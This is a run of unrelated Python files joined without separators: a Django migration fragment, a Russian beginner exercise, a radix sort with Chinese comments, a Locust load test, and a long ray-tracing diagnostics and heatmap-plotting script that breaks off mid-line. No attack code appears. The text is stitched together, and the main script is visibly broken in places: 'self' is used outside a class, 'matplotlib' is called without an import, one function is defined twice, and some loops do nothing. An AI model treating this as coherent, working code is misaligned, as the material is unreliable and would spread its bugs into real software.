to=settings.AUTH_USER_MODEL)), ], ), ] #Задание 3. Вариант 32 #Напишите программу, которая выводит имя "", и запрашивает его псевдоним. Программа должна сцеплять две эти строки и выводить полученную строку, разделяя имя и псевдоним с помощью тире. # #10.03.2016 print("Герой нашей сегоднешней программы - ") print("Под каким же именем мы знаем этого человека? Ваш ответ: Фред Астер") print("Все верно: - Фред Астер") input("Нажмите Enter для выхода из программы") """ Unit tests for XYZ package. ------------------------------------------------------------------------------ COPYRIGHT/LICENSE. This file is part of the XYZ package. It is subject to the license terms in the LICENSE file found in the top-level directory of this distribution. No part of the XYZ package, including this file, may be copied, modified, propagated, or distributed except according to the terms contained in the LICENSE file. ------------------------------------------------------------------------------ """ # -*- coding: utf-8 -*- # @Time : 19-5-20 上午10:39 # @Author : Redtree # @File : radix_sort.py # @Desc : 基数排序 #----基数排序---- #确定排序的次数 #排序的顺序跟序列中最大数的位数相关 def radix_sort_nums(L): maxNum = L[0] #寻找序列中的最大数 for x in L: if maxNum < x: maxNum = x #确定序列中的最大元素的位数 times = 0 while (maxNum > 0): maxNum = (int)(maxNum/10) times = times+1 return times #找到num从低到高第pos位的数据 def get_num_pos(num,pos): return ((int)(num/(10**(pos-1))))%10 #基数排序 def dosort(L): count = 10*[None] #存放各个桶的数据统计个数 bucket = len(L)*[None] #暂时存放排序结果 #从低位到高位依次执行循环 for pos in range(1,radix_sort_nums(L)+1): #置空各个桶的数据统计 for x in range(0,10): count[x] = 0 #统计当前该位(个位,十位,百位....)的元素数目 for x in range(0,len(L)): #统计各个桶将要装进去的元素个数 j = get_num_pos(int(L[x]),pos) count[j] = count[j]+1 #count[i]表示第i个桶的右边界索引 for x in range(1,10): count[x] = count[x] + count[x-1] #将数据依次装入桶中 for x in range(len(L)-1,-1,-1): #求出元素第K位的数字 j = get_num_pos(L[x],pos) #放入对应的桶中,count[j]-1是第j个桶的右边界索引 bucket[count[j]-1] = L[x] #对应桶的装入数据索引-1 count[j] = count[j]-1 # 将已分配好的桶中数据再倒出来,此时已是对应当前位数有序的表 for x in range(0,len(L)): L[x] = bucket[x] return Lfrom locust import HttpUser, between, task class WebsiteUser(HttpUser): wait_time = between(5, 15) # def on_start(self): # self.client.post("/login", { # "username": "test_user", # "password": "" # }) @task def index(self): self.client.get("/") # self.client.get("/static/assets.js") # @task # def about(self): # self.client.get("/about/") import sys import struct import json import random import tarfile import os import argparse import pint import math import csv U = pint.UnitRegistry() import matplotlib as mpl mpl.use('Agg') import matplotlib.pyplot as plt plt.rcParams['image.interpolation'] = 'nearest' import seaborn as sns import numpy as np import pandas as pd from collections import defaultdict from concurrent.futures import ThreadPoolExecutor from matplotlib.colors import LogNorm from PIL import Image from typing import List from multiprocessing import Pool from functools import partial sns.set_style("ticks", {'axes.grid': True}) TREELET_TYPE = 0 def read_intervals(f, num_workers): worker_intervals = {} for line in f: tokens = line.split(' ') worker_id = int(tokens[1]) num_actions = int(tokens[2]) offset = 3 intervals = [] for _ in range(num_actions): action_name = tokens[offset] num_intervals = int(tokens[offset + 1]) offset += 2 for n in range(num_intervals): start, end = tokens[offset + n].split(',') intervals.append((action_name, int(start), int(end))) offset += num_intervals worker_intervals[worker_id] = intervals if len(worker_intervals) == num_workers: break return worker_intervals class WorkerDiagnostics(object): def __init__(self, idx, file_path : str): self.idx = idx self.path = file_path self.metrics = defaultdict(list) time_per_action = defaultdict(dict) bytes_sent_per_worker = defaultdict(dict) self.timestamps = [] self.top_level_actions = set() with open(file_path, 'r') as f: _, start_timestamp = f.readline().strip().split(' ') self.start_timestamp = int(start_timestamp) for line in f: timestamp, json_data = line.strip().split(' ') timestamp = int(timestamp) self.timestamps.append(timestamp) data = json.loads(json_data) if 'timePerAction' in data: for tup in data['timePerAction']: name = tup['name'] time = int(tup['time']) if ':' not in name: self.top_level_actions.add(name) time_per_action[name][timestamp] = time del data['timePerAction'] if 'metricsOverTime' in data: del data['metricsOverTime'] if 'intervalsPerAction' in data: del data['intervalsPerAction'] if 'bytesSentPerWorker' in data: for k, v in data['bytesSentPerWorker'].items(): bytes_sent_per_worker[k][timestamp] = v del data['bytesSentPerWorker'] if 'bytesReceivedPerWorker' in data: del data['bytesReceivedPerWorker'] for name, value in data.items(): self.metrics[name].append(float(value)) self.time_per_action = defaultdict(list) self.bytes_sent_per_worker = defaultdict(list) for t in self.timestamps: for k, v in time_per_action.items(): if t in v: value = v[t] else: value = 0 self.time_per_action[k].append(value) for k, v in bytes_sent_per_worker.items(): if t in v: value = v[t] else: value = 0 self.bytes_sent_per_worker[k].append(value) def percentage_action(self, action, idx=-1): if len(self.timestamps) == 0: return 0 if idx < 0: total = sum(self.time_per_action[action]) return total / self.timestamps[len(self.timestamps) - 1] else: assert len(self.timestamps) > idx start = self.timestamps[idx - 1] if idx > 0 else 0 end = self.timestamps[idx] interval = end - start return self.time_per_action[action][idx] / interval def percentage_busy(self, idx=-1): return 1.0 - self.percentage_action('poll', idx) class WorkerStats(object): def __init__(self, idx, file_path : str): self.idx = idx self.path = file_path self.aggregate_stats = defaultdict(list) self.queue_stats = defaultdict(list) treelet_stats = defaultdict(lambda: defaultdict(dict)) stat_keys = set() self.timestamps = [] with open(file_path, 'r') as f: _, start_timestamp = f.readline().strip().split(' ') self.start_timestamp = int(start_timestamp) prev_data = defaultdict(dict) for line in f: split_line = line.strip().split(' ') if len(split_line) < 2: continue timestamp, json_data = split_line timestamp = int(timestamp) self.timestamps.append(timestamp) data = json.loads(json_data) for k, v in data['aggregateStats'].items(): self.aggregate_stats[k].append(v) for k, v in data['queueStats'].items(): self.queue_stats[k].append(v) for ray_stats in data['objectStats']: object_key = ray_stats['id'] typ = object_key['type'] typ_id = int(object_key['id']) stats = ray_stats['stats'] if typ != TREELET_TYPE: continue for metric_name, v in stats.items(): prev_v = 0 if (typ_id in prev_data and metric_name in prev_data[typ_id]): prev_v = prev_data[typ_id][metric_name] treelet_stats[typ_id][metric_name][timestamp] = float(v) - prev_v prev_data[typ_id][metric_name] = float(v) stat_keys.add(metric_name) self.treelet_stats = {} for treelet_id in treelet_stats.keys(): self.treelet_stats[treelet_id] = {} for stat_key in stat_keys: self.treelet_stats[treelet_id][stat_key] = [] ll = self.treelet_stats[treelet_id][stat_key] tvs = treelet_stats[treelet_id][stat_key] for t in self.timestamps: if t in tvs: v = tvs[t] else: v = 0 ll.append(v) def _load_fn(diagnostics_directory, path): diag = None if path.endswith('DIAG'): diag = WorkerDiagnostics(int(path[:path.find('.DIAG')]), os.path.join(diagnostics_directory, path)) stats = None if path.endswith('STATS'): stats = WorkerStats(int(path[:path.find('.STATS')]), os.path.join(diagnostics_directory, path)) print('.', end='', flush=True) return diag, stats class Stats(object): def __init__(self, diagnostics_directory : str): worker_files = os.listdir(diagnostics_directory) self.worker_diagnostics = [] self.worker_stats = [] with Pool() as p: results = p.map(partial(_load_fn, diagnostics_directory), worker_files) for d, s in results: if d: self.worker_diagnostics.append(d) if s: self.worker_stats.append(s) def write_csv(self, path: str): quanta = 2.0 * 1e6 # seconds -> microseconds start_timestamp = self.worker_stats[0].start_timestamp end_timestamp = 0 for stats in self.worker_stats: start_ts = stats.start_timestamp end_ts = start_ts + stats.timestamps[-1] if start_ts < start_timestamp or end_ts > end_timestamp: print('Current min {:d}, max {:d}'.format(start_timestamp, end_timestamp)) print('Worker id {:d}, min {:d}, max {:d}, path {:s}'.format(stats.idx, start_ts, end_ts, stats.path)) start_timestamp = min(start_timestamp, start_ts) end_timestamp = max(end_timestamp, end_ts) #for diag in self.worker_diagnostics: # start_ts = diag.start_timestamp # end_ts = start_ts + stats.timestamps[-1] # if start_ts < start_timestamp or end_ts > end_timestamp: # print('Current min {:d}, max {:d}'.format(start_timestamp, end_timestamp)) # print('Worker id {:d}, min {:d}, max {:d}, path {:s}'.format(diag.idx, # start_ts, end_ts, diag.path)) # start_timestamp = min(start_timestamp, start_ts) # end_timestamp = max(end_timestamp, end_ts) end_timestamp += quanta * 2 total_duration = end_timestamp - start_timestamp num_timepoints = int(math.ceil(total_duration / quanta)) print('Time bounds: ({:f}, {:f}), {:f} seconds'.format(start_timestamp * 1e-6, end_timestamp * 1e-6, total_duration * 1e-6)) print('Quantizing to {:2f} second interval'.format(quanta * 1e-6)) print('# timepoints:', num_timepoints) # Pre-process data to fixed quantization #fieldnames = ['workerID', 'treeletID', 'timestamp', # 'tracingRaysTime', 'idleTime', # 'raysWaiting', 'raysProcessed', 'raysGenerated', 'raysSending', 'raysReceived', # 'bandwidthIn', 'bandwidthOut'] # bandwidth, tracing time per_worker_data = {} per_worker_worker_fieldnames = [ 'workerID', 'targetWorkerID', 'timestamp', 'bytesSent'] per_worker_worker_data = {} # rays processed, rays generated, etc per_worker_treelet_fieldnames = [ 'workerID', 'treeletID', 'timestamp', 'raysWaiting', 'raysProcessed', 'raysGenerated', 'raysSending', 'raysReceived'] per_worker_treelet_data = {} csv_data = {} print('Quantizing worker stats', end='', flush=True) for stats in self.worker_stats: min_timestamp = stats.start_timestamp max_timestamp = min_timestamp + stats.timestamps[-1] # Get the treelet fields and quantize to global time scale treelet_rows = defaultdict(lambda: defaultdict(list)) for treelet_id, treelet_stats in stats.treelet_stats.items(): for field, key in [('processedRays', 'raysProcessed'), ('waitingRays', 'raysWaiting'), ('demandedRays', 'raysGenerated'), ('sendingRays', 'raysSending'), ('receivedRays', 'raysReceived')]: quantized_timestamps, quantized_data = quantize_sequence( [min_timestamp] + [min_timestamp + x for x in stats.timestamps], [0] + treelet_stats[field], quanta, start=start_timestamp, end=end_timestamp) treelet_rows[treelet_id][key] = quantized_data # Insert rows into per_worker_treelet_data for treelet_id, _ in stats.treelet_stats.items(): for i in range(num_timepoints): timepoint = start_timestamp + quanta * i data = { 'workerID': stats.idx, 'treeletID': treelet_id, 'timestamp': timepoint, } for k, v in treelet_rows[treelet_id].items(): data[k] = v[i] per_worker_treelet_data[(stats.idx, treelet_id, timepoint)] = data print('.', end='', flush=True) print() for diag in self.worker_diagnostics: for treelet_id, treelet_stats in stats.treelet_stats.items(): for tidx in range(num_timepoints): # tracingRaysTime timestamp = tidx * quanta print('Writing {:s}...'.format(path)) with open(path, 'w', newline='') as csvfile: writer = csv.DictWriter(csvfile, fieldnames=per_worker_treelet_fieldnames) writer.writeheader() for k, v in per_worker_treelet_data.items(): writer.writerow(v) print('Wrote {:s}.'.format(path)) class Constants(object): # Ray data structure size INT_SIZE = 4 * U.bytes FLOAT_SIZE = 4 * U.bytes STACK_LENGTH = 20 RAY_FIELDS = { 'origin': 2 * 3 * FLOAT_SIZE, 'sample_location': 2 * FLOAT_SIZE, 'min_t': FLOAT_SIZE, 'max_t': FLOAT_SIZE, 'weight': FLOAT_SIZE, 'medium': INT_SIZE, 'stack': INT_SIZE * STACK_LENGTH } RADIANCE_RAY_FIELDS = { 'origin_x': 3 * FLOAT_SIZE, 'direction_x': 3 * FLOAT_SIZE, 'origin_y': 3 * FLOAT_SIZE, 'direction_y': 3 * FLOAT_SIZE } SHADOW_RAY_SIZE = sum([x for _, x in RAY_FIELDS.items()]) RADIANCE_RAY_SIZE = SHADOW_RAY_SIZE + sum( [x for _, x in RADIANCE_RAY_FIELDS.items()]) # Global constants W = 1920 # image width H = 1080 # image height SAMPLES_PER_PIXEL = 256 # samples per pixel GEOMETRY_SIZE = 20 * U.gigabytes # size of the scene geometry TS = 1 * U.gigabytes # treelet size TT = GEOMETRY_SIZE / TS # total treelets S = W * H * SAMPLES_PER_PIXEL # samples per pixel L = 5 # average path length (# of bounces) T = np.log(TT) # average number of treelets per ray RAY_FOOTPRINT = SHADOW_RAY_SIZE * 0.5 + RADIANCE_RAY_SIZE * 0.5 # average ray footprint TOTAL_FOOTPRINT = (RAY_FOOTPRINT * S * (2 * L - 1)).to(U.gigabyte) LAMBDA_BANDWIDTH = 47 * U.gigabytes LAMBDA_BOOT_TIME = 4 LAMBDA_COST = 0.18 / (60 * 60) CPU_TIME_PER_RAY_TRAVERSAL = 40 * 1e-6 class SceneStats(object): def __init__(self, scene_file_path): self.geometry_size = 10 self.treelet_size = 10 self.num_treelets = 10 self.image_width = 1920 self.image_height = 1020 self.samples_per_pixel = 256 self.num_lambdas = 600 self.shadow_ray_size = Constants.SHADOW_RAY_SIZE self.radiance_ray_size = Constants.RADIANCE_RAY_SIZE self.ray_size = (self.shadow_ray_size + self.radiance_ray_size) / 2 self.total_samples = self.image_width * self.image_height * self.samples_per_pixel self.path_length = Constants.L self.traversals_per_ray = np.log(self.num_treelets) def write_trace(stats, path: str): """ Generates a trace file in Chrome format. To visualize the trace, visit chrome://tracing in Google Chrome and click "Load" in the top left to load the trace. Args ---- path Output path to write the trace. """ worker_intervals = stats.intervals # https://github.com/catapult-project/catapult/blob/master/tracing/tracing/base/color_scheme.html colors = {'idle': 'grey'} traces = [] def make_trace_from_interval(interval, proc, tid): name, start, end = interval cat = '' trace = { 'name': name, 'cat': cat, 'ph': 'X', 'ts': start / 1000, # ns to microseconds 'dur': (end - start) / 1000, 'pid': proc, 'tid': tid, 'args': {} } if interval[0] in colors: trace['cname'] = colors[interval[0]] return trace if False and self._master_profiler is not None: traces.append({ 'name': 'thread_name', 'ph': 'M', 'pid': -1, 'tid': 0, 'args': {'name': 'master'} }) for interval in self._master_profiler[1]['intervals']: traces.append(make_trace_from_interval(interval, 'master', -1, 0)) for worker_id, intervals in worker_intervals.items(): tid = worker_id worker_num = worker_id tag = None proc = worker_id print('Generating traces for worker {:d}...'.format(tid)) traces.append({ 'name': 'thread_name', 'ph': 'M', 'pid': proc, 'tid': tid, 'args': { 'name': '{:06d}'.format(worker_num) + ("_" + str(tag) if tag else "") } }) for interval in intervals: if interval[0] == 'idle': # We ignore the idle interval when visualizing continue traces.append(make_trace_from_interval(interval, proc, tid)) worker_metrics = stats.metrics def make_counter_from_metric(name, metric, proc, tid): time, value = metric cat = '' trace = { 'name': name, 'cat': cat, 'ph': 'C', 'ts': time / 1000, # ns to microseconds 'pid': proc, 'tid': tid, 'args': { name: value } } if metric[0] in colors: trace['cname'] = colors[interval[0]] return trace for worker_id, metrics in worker_metrics.items(): tid = worker_id worker_num = worker_id tag = None proc = worker_id print('Generating metrics for worker {:d}...'.format(tid)) for name, points in metrics.items(): for point in points: traces.append(make_counter_from_metric(name, point, proc, tid)) parts = path.split('.') base = parts[0] exts = parts[1:] with open(base + '.trace', 'w') as f: f.write(json.dumps(traces)) if exts == ['trace']: return path elif exts == ['tar', 'gz']: with tarfile.open(base + '.tar.gz', 'w:gz') as tar: tar.add(base + '.trace') os.remove(base + '.trace') return path else: raise Exception("Invalid trace extension '{}'. Must be .trace or .tar.gz." \ .format(''.join(['.' + e for e in exts]))) def merge_sequences(timepoints : List[List[int]], data : List[List[float]]): raise Exception() merged_timepoints = [] merged_data = [] num_sequences = len(timepoints) offsets = [0 for _ in range(num_sequences)] while True: for i in range(num_sequences): pass return merged_timepoints, merged_data def quantize_sequence(timepoints, data, quanta, start=None, end=None, rate=False): quantized_timepoints = [] quantized_data = [] def push(timepoint, data): quantized_timepoints.append(timepoint) quantized_data.append(data) if len(data) == 0: return [] current_time = start or timepoints[0] end_time = end or timepoints[-1] # Insert zeros up to the start of timepoints if the start time is before # timepoints while current_time + quanta < timepoints[0]: push(current_time, 0) current_time += quanta # Find the starting offset if the start is inside the sequence offset = 1 if start: while offset < len(timepoints): time = timepoints[offset] if time > current_time: break offset += 1 current_time_in_interval = min(timepoints[offset - 1], current_time) prev_summed_value = 0 summed_value = 0 # Sum over multiple timepoints while offset < len(timepoints) and current_time < end_time: # Invariant: timepoints[offset - 1] <= current_time + quanta < timepoints[offset] prev_timepoint = timepoints[offset - 1] prev_value = data[offset - 1] timepoint = timepoints[offset] value = data[offset] interval = float(timepoint - prev_timepoint) contribution = value if rate: contribution /= interval # Add the contribution from this interval next_time_in_interval = min(timepoint, current_time + quanta) this_interval = float(next_time_in_interval - current_time_in_interval) if this_interval > 0: this_contribution = value * (this_interval / interval) if rate: this_contribution /= this_interval else: this_contribution = 0 summed_value += this_contribution if current_time + quanta <= timepoint: # We've reached the end of this quanta, so append a new entry push(current_time, prev_summed_value) prev_summed_value = summed_value summed_value = 0 current_time += quanta current_time_in_interval = current_time if current_time > timepoint: # Step to the next timepoint only if we've moved past the current # one offset += 1 else: # Still inside the quanta, so step to the next timepoint current_time_in_interval = timepoint offset += 1 # Add zeros at the end of the sequence while current_time < end_time: push(current_time, prev_summed_value) prev_summed_value = summed_value summed_value = 0 current_time += quanta return quantized_timepoints, quantized_data def heatmap(data, row_labels, col_labels, ax=None, cbar_kw={}, cbarlabel="", dense_xticks=False, dense_yticks=False, **kwargs): """ Create a heatmap from a numpy array and two lists of labels. Arguments: data : A 2D numpy array of shape (N,M) row_labels : A list or array of length N with the labels for the rows col_labels : A list or array of length M with the labels for the columns Optional arguments: ax : A matplotlib.axes.Axes instance to which the heatmap is plotted. If not provided, use current axes or create a new one. cbar_kw : A dictionary with arguments to :meth:`matplotlib.Figure.colorbar`. cbarlabel : The label for the colorbar All other arguments are directly passed on to the imshow call. """ if not ax: ax = plt.gca() # Plot the heatmap im = ax.imshow(data, **kwargs) # Create colorbar cbar = ax.figure.colorbar(im, ax=ax, **cbar_kw) cbar.ax.set_ylabel(cbarlabel, rotation=-90, va="bottom") # We want to show all ticks... #ax.set_xticks(np.arange(data.shape[1])) # ... and label them with the respective list entries. if dense_xticks: xtick_spacing = 1 else: xtick_spacing = (data.shape[1] // 5) or 1 ax.set_xticks(np.arange(data.shape[1])[::xtick_spacing]) ax.set_xticklabels(col_labels[::xtick_spacing]) if dense_yticks: ytick_spacing = 1 else: ytick_spacing = (data.shape[0] // 5) or 1 ax.set_yticks(np.arange(data.shape[0])[::ytick_spacing]) ax.set_yticklabels(row_labels[::ytick_spacing]) # Let the horizontal axes labeling appear on top. #ax.tick_params(top=True, bottom=False, # labeltop=True, labelbottom=False) # Rotate the tick labels and set their alignment. #plt.setp(ax.get_xticklabels(), rotation=-30, ha="right", # rotation_mode="anchor") # Turn spines off and create white grid. for edge, spine in ax.spines.items(): spine.set_visible(False) ax.set_xticks(np.arange(data.shape[1]+1)-.5, minor=True) ax.set_yticks(np.arange(data.shape[0]+1)-.5, minor=True) ax.grid(which="minor", color="w", linestyle='-', linewidth=0.1) ax.grid(which="major", color="w", linestyle='-', linewidth=0) ax.tick_params(which="minor", bottom=False, left=False) plt.tight_layout() return im, cbar def annotate_heatmap(im, data=None, valfmt="{x:.2f}", textcolors=["black", "white"], threshold=None, **textkw): """ A function to annotate a heatmap. Arguments: im : The AxesImage to be labeled. Optional arguments: data : Data used to annotate. If None, the image's data is used. valfmt : The format of the annotations inside the heatmap. This should either use the string format method, e.g. "$ {x:.2f}", or be a :class:`matplotlib.ticker.Formatter`. textcolors : A list or array of two color specifications. The first is used for values below a threshold, the second for those above. threshold : Value in data units according to which the colors from textcolors are applied. If None (the default) uses the middle of the colormap as separation. Further arguments are passed on to the created text labels. """ if not isinstance(data, (list, np.ndarray)): data = im.get_array() # Normalize the threshold to the images color range. if threshold is not None: threshold = im.norm(threshold) else: threshold = im.norm(data.max())/2. # Set default alignment to center, but allow it to be # overwritten by textkw. kw = dict(horizontalalignment="center", verticalalignment="center") kw.update(textkw) # Get the formatter in case a string is supplied if isinstance(valfmt, str): valfmt = matplotlib.ticker.StrMethodFormatter(valfmt) # Loop over the data and create a `Text` for each "pixel". # Change the text's color depending on the data. texts = [] for i in range(data.shape[0]): for j in range(data.shape[1]): kw.update(color=textcolors[im.norm(data[i, j]) > threshold]) text = im.axes.text(j, i, valfmt(data[i, j], None), **kw) texts.append(text) return texts def plot_metric_heatmap(stats, metric_label, sort=False): quantization = 1000 * 1e6 # ms to nanoseconds # Deteremine number of rows num_timepoints = 0 for worker_id, metrics in stats.metrics.items(): points = metrics[metric_label] for time, _ in points: quantized_time = time // quantization if quantized_time > num_timepoints: num_timepoints = quantized_time num_timepoints = int(num_timepoints) + 1 # Deteremine number of columns num_workers = len(stats.metrics) data = np.zeros((num_workers, num_timepoints)) row_labels = [] for worker_idx, (worker_id, metrics) in enumerate(stats.metrics.items()): row_labels.append(worker_id) points = metrics[metric_label] quantized_points = quantize_sequence(points, quantization) for i, (time, value) in enumerate(quantized_points): data[worker_idx, i] = value * 1e9 col_labels = [int(x[0] * 1e-9) for x in quantized_points] fig = plt.figure(dpi=300) ax = plt.subplot() im, cbar = heatmap(data, row_labels, col_labels, ax=ax, norm=LogNorm()) return fig def plot_action_heatmap(worker_stats): num_worker_timestamps = len(worker_stats.timestamps) # Deteremine number of rows num_timepoints = num_worker_timestamps # Deteremine number of columns num_actions = len(worker_stats.top_level_actions) data = np.zeros((num_actions, num_timepoints)) row_labels = [] for action_idx, action_name in enumerate(sorted(list(worker_stats.top_level_actions))): row_labels.append(action_name) points = worker_stats.time_per_action[action_name] for i in range(num_timepoints): p = worker_stats.percentage_action(action_name, i) data[action_idx, i] = p col_labels = [int(x * 1e-6) for x in worker_stats.timestamps] fig = plt.figure(dpi=300) ax = plt.subplot() im, cbar = heatmap(data, row_labels, col_labels, ax=ax, dense_yticks=True, aspect='auto') return fig def plot_worker_heatmap(all_worker_stats, metric): '''Plot a treelet metric over time for all treelets''' workers = {} for w in all_worker_stats: workers[int(w.idx)] = w # Number of rows worker_ids = list(sorted(workers.keys())) # Determine number of columns timestamp_sets = [set(stats.timestamps) for stats in all_worker_stats] timestamps = set() for s in timestamp_sets: timestamps = timestamps.union(s) timestamps = sorted(list(timestamps)) num_timepoints = len(timestamps) data = np.zeros((len(worker_ids), num_timepoints)) row_labels = [] for i, idx in enumerate(worker_ids): row_labels.append(idx) points = workers[idx].aggregate_stats[metric] ts = workers[idx].timestamps for j, t in enumerate(timestamps): if t in ts: data[i, j] = points[ts.index(t)] col_labels = [int(x * 1e-6) for x in timestamps] fig = plt.figure(dpi=300) ax = plt.subplot() im, cbar = heatmap(data, row_labels, col_labels, ax=ax, aspect='auto') return fig def plot_utilization_heatmap(all_worker_diags): '''Plot a treelet metric over time for all treelets''' workers = {} for w in all_worker_diags: workers[int(w.idx)] = w # Number of rows worker_ids = list(sorted(workers.keys())) # Determine number of columns timestamp_sets = [set(stats.timestamps) for stats in all_worker_diags] timestamps = set() for s in timestamp_sets: timestamps = timestamps.union(s) timestamps = sorted(list(timestamps)) num_timepoints = len(timestamps) data = np.zeros((len(worker_ids), num_timepoints)) row_labels = [] for i, idx in enumerate(worker_ids): row_labels.append(idx) ts = workers[idx].timestamps for j, t in enumerate(timestamps): if t in ts: data[i, j] = workers[idx].percentage_busy(ts.index(t)) col_labels = [int(x * 1e-6) for x in timestamps] fig = plt.figure(dpi=300) ax = plt.subplot() im, cbar = heatmap(data, row_labels, col_labels, ax=ax, aspect='auto') return fig def aggregate_treelet_stats(all_worker_stats): # Get the list of treelet ids and stat keys treelet_ids = set() stat_keys = set() for worker in all_worker_stats: for treelet_id, treelet_stats in worker.treelet_stats.items(): treelet_ids.add(treelet_id) for k, _ in treelet_stats.items(): stat_keys.add(k) # Determine number of columns timestamp_sets = [set(stats.timestamps) for stats in all_worker_stats] timestamps = set() for s in timestamp_sets: timestamps = timestamps.union(s) timestamps = sorted(list(timestamps)) num_timepoints = len(timestamps) # Aggregate treelet stats across all workers treelet_stats = {} for tid in treelet_ids: treelet_stats[tid] = {} for key in stat_keys: treelet_stats[tid][key] = [0 for _ in range(num_timepoints)] for worker_stats in all_worker_stats: for i, t in enumerate(timestamps): if t in worker_stats.timestamps: idx = worker_stats.timestamps.index(t) for treelet_id, wtreelet_stats in worker_stats.treelet_stats.items(): for key in stat_keys: treelet_stats[treelet_id][key][i] += int(wtreelet_stats[key][idx]) return treelet_stats, timestamps def plot_treelet_heatmap(treelet_stats, timestamps, metric): '''Plot a treelet metric over time for all treelets''' # Number of rows treelet_ids = sorted([int(x) for x in list(treelet_stats.keys())]) # Number of columns num_timepoints = len(timestamps) data = np.zeros((len(treelet_ids), num_timepoints)) row_labels = [] for idx, treelet_id in enumerate(treelet_ids): row_labels.append(treelet_id) points = treelet_stats[treelet_id][metric] print(idx, end=' ') for i, d in enumerate(points): data[idx, i] = d if d > 100000: print(d, end=' ') print() col_labels = [int(x * 1e-6) for x in timestamps] fig = plt.figure(dpi=300) ax = plt.subplot() im, cbar = heatmap(data, row_labels, col_labels, ax=ax, aspect='auto') return fig def plot_treelet_worker_rays(treelet_stats, worker_stats, metric, max_workers=15, normalized=False): '''Plot distribution of treelet rays to workers''' # Number of rows treelet_ids = sorted([int(x) for x in list(treelet_stats.keys())]) # Number of columns num_workers = min(len(worker_stats), max_workers) data = np.zeros((len(treelet_ids), num_workers)) row_labels = [] for idx, treelet_id in enumerate(treelet_ids): row_labels.append(treelet_id) treelet_value = sum(treelet_stats[treelet_id][metric]) or 0.00001 values = [] for i in range(len(worker_stats)): stats = worker_stats[i] value = 0 if treelet_id in stats.treelet_stats: value = sum([int(x) for x in stats.treelet_stats[treelet_id][metric]]) if normalized: value = value / treelet_value values.append(value) values.sort() values = list(reversed(values)) for i in range(num_workers): data[idx, i] = values[i] col_labels = range(num_workers) fig = plt.figure(dpi=300) ax = plt.subplot() im, cbar = heatmap(data, row_labels, col_labels, ax=ax, aspect='auto') return fig def plot_treelet_worker_rays(treelet_stats, worker_stats, metric, max_workers=15, normalized=False): '''Plot distribution of treelet rays to workers''' # Number of rows treelet_ids = sorted([int(x) for x in list(treelet_stats.keys())]) # Number of columns num_workers = min(len(worker_stats), max_workers) data = np.zeros((len(treelet_ids), num_workers)) row_labels = [] for idx, treelet_id in enumerate(treelet_ids): row_labels.append(treelet_id) treelet_value = sum(treelet_stats[treelet_id][metric]) or 0.00001 values = [] for i in range(len(worker_stats)): stats = worker_stats[i] value = 0 if treelet_id in stats.treelet_stats: value = sum([int(x) for x in stats.treelet_stats[treelet_id][metric]]) if normalized: value = value / treelet_value values.append(value) values.sort() values = list(reversed(values)) for i in range(num_workers): data[idx, i] = values[i] col_labels = range(num_workers) fig = plt.figure(dpi=300) ax = plt.subplot() im, cbar = heatmap(data, row_labels, col_labels, ax=ax, aspect='auto') return fig def plot_metrics(stats, path): quantization = 1000 * 1e6 # nanoseconds plt.clf() metric_labels = ['bytesSent', 'bytesReceived', 'outstandingUdp'] # Plot heatmaps for each worker over time # for metric_name in metric_labels: # fig = plot_metric_heatmap(stats, metric_name) # plt.savefig(os.path.join(path, 'heatmap_{:s}.png'.format(metric_name))) # plt.close(fig) # plt.clf() # Plot heatmaps showing time spent in each action for least/most idle worker, and average worker most_busy = 0.0 most_busy_worker = stats.worker_diagnostics[0] least_busy = 1.0 least_busy_worker = stats.worker_diagnostics[0] for worker in stats.worker_diagnostics: if len(worker.timestamps) == 0: continue busy = worker.percentage_busy() * len(worker.timestamps) if busy > most_busy: most_busy = busy most_busy_worker = worker if busy < least_busy: least_busy = busy least_busy_worker = worker if len(most_busy_worker.timestamps) > 0: fig = plot_action_heatmap(most_busy_worker) plt.savefig(os.path.join(path, 'most_busy_worker_action_heatmap.png')) plt.close(fig) plt.clf() print('Graphed most busy worker action heatmap.') if len(least_busy_worker.timestamps) > 0: fig = plot_action_heatmap(least_busy_worker) plt.savefig(os.path.join(path, 'least_busy_worker_action_heatmap.png')) plt.close(fig) plt.clf() print('Graphed least busy worker action heatmap.') print('Graphing worker heatmaps...') plot_utilization_heatmap(stats.worker_diagnostics) plt.savefig(os.path.join(path, 'worker_utilization_heatmap.png')) plt.close(fig) plt.clf() for metric in ['processedRays', 'receivedRays', 'sendingRays']: plot_worker_heatmap(stats.worker_stats, metric) plt.savefig(os.path.join(path, 'worker_heatmap_{:s}.png'.format(metric))) plt.close(fig) plt.clf() print('Graphed worker heatmaps.') print('Aggregating treelet stats...') treelet_stats, timestamps = aggregate_treelet_stats(stats.worker_stats) print('Done aggregating treelet stats.') for metric in ['sendingRays', 'processedRays']: plot_treelet_heatmap(treelet_stats, timestamps, metric) plt.savefig(os.path.join(path, 'treelet_heatmap_{:s}.png'.format(metric))) plt.close(fig) plt.clf() print('Graphed treelet heatmap.') plot_treelet_worker_rays(treelet_stats, stats.worker_stats, 'processedRays', normalized=True) plt.savefig(os.path.join(path, 'treelet_worker_processedRays_normalized.png')) plt.close(fig) plt.clf() plot_treelet_worker_rays(treelet_stats, stats.worker_stats, 'processedRays') plt.savefig(os.path.join(path, 'treelet_worker_processedRays.png')) plt.close(fig) plt.clf() print('Graphed treelet-worker heatmap.') return # Plot a chart over time showing min/median/max worker stats for metric_name in metric_labels: for worker_id, metrics in worker_stats.metrics.items(): data = { 'ids': [], 'time': [], 'value': [], } points = metrics[metric_name] current_time = quantization offset = 1 summed_value = 0 while offset < len(points): timePrev, valuePrev = points[offset - 1] time, value = points[offset] interval = float(time - timePrev) contribution = value / interval #print(metric_name, value, time, timePrev, interval) if time >= current_time: # Add % contribution from prior interval alpha = 1.0 - (time - current_time) / interval #print(time, current_time, alpha) summed_value += contribution * alpha data['ids'].append(worker_id) data['time'].append(current_time / 1e9) data['value'].append(summed_value * 1e9) # to seconds current_time += quantization summed_value = 0 beta = 1.0 - alpha summed_value += contribution * beta else: summed_value += contribution offset += 1 for i in range(len(data['time']) - 1): if data['time'][i + 1] < data['time'][i]: print(data['time'][i], data['time'][i + 1]) if False and metric_name == 'bytesReceived': print(data['time'], data['value']) print(points) plt.semilogy(data['time'], data['value']) plt.savefig(os.path.join(path, 'metric_{:s}.png'.format(metric_name))) plt.clf() def calculate_run_time(run_stats): '''Calculate the time of a run under the stationary treelets model The time of a run is: ''' boot_time = run_stats['boot_time'] worker_max_bandwidth = run_stats['worker_max_bandwidth'] total_bandwidth_used = (run_stats['total_bandwidth_used'] if 'total_bandwidth_used' in run_stats else 0) total_rays = run_stats['total_rays'] traversals_per_ray = 